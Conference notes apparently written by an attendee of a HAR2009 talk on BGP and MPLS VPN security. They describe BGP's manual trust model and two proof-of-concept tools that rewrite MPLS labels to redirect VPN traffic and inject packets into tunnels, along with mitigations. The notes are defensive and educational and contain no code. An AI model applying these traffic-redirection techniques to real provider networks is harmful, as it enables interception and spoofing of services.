Information on the talk can be found on the HAR2009 Wiki. The talk was limited by the time slot. Some information on the MPLS Layer 2 VPN was rushed, so there is limited information. I’d suggest checking out the slides once they’re posted (not currently listed in the program)
Main focus of the talk will be on
- Carrier Ethernet
Works over and relies on TCP/IP
Harder to spoof as it uses TCP (not a UDP, fire and forget packet)
BGP Trust model is based on manual configuration (or by script). This is referred to as “Intra Operator Trust”. Due to the manual basis of updates it is prone to human error (see AS7007 incident and Youtube/Pakistan).
“Once you’re a member of the “global BGP community” you might perform all sorts of nasty stuff” Pilsov / Kapela 2008
BGP Security isn’t based within the protocol itself, but relies on the security measures of TCP. This includes the use of the “generic MD5 signature option” (RFC 2385). Currently there is a working group looking at the TCP Auth options. Use of MD5 keys isn’t always used in large installs due to the complexity of management.
Tools (including live demos)
MPLS is defined in RFC3031 and is used in provider backbones to label traffic. Packets can carry multiple labels.
Both MPLS Layer 3 VPNs (RFC4364) and MPLS Layer 2 VPNs (RFC) will be discussed as they can be found in most large organizations.
MPLS Layer 3 VPNs
Comparable to Frame Relay/ATM in some respects
Highly “virtual” technology
During transport 2 labels are used.
- First: Identifies the ‘egress PE’ / Route
- Second: Identifies the customer/particular VPN
Due to the infrastructure, it is possible for multiple customers to use the same IP address space.
Once an attacker is inside the MPLS, they can do almost anything they want. The design of the technology prevents attack from outside of the network. Inside the network, there are not additional security restrictions.
POC attack tool for MPLS redirection – mps_redirect
The command-line tool edits the VPN labels of packets to redirect all traffic for the victim network to the attackers network.
MPLS labels are transmiitted in clear-text across the network. By sitting in the datapath it’s possible to rewrite the MPLS labels and communicate between VPNs.
This attack allows systems to be spoofed at the MPLS level. Examples, are replacing your DNS or LDAP server with attacker versions.
POC attack tool for MPLS injection – mps_tun
Creates a TUN interface that allows the attacker to inject packets into the VPN tunnel (use your favourite attack tools through the TUN interface).
60-80% of providers would allow complete control over an MPLS end-point. This would enable an attacker to perform these attacks.
Mitigation – Authenticate everything, Implement “borders of trust” that encrypt/decrypt all inbound traffic on a site level
MPLS Layer 2 VPNs
These networks expose the VPNs to current layer 2 threats, such as ARP spoofing across the VPNs. Most yersnia style attacks will also work in the MPLS-Cloud.
The presenters are running a workshop (full MPLS lab setup) at FuWaR village at 14:30 today
Update: Some of the tools and presentation can be downloaded on the ERNW.DE website, the presentation from BlackHat europe appears to be the most modern on the site.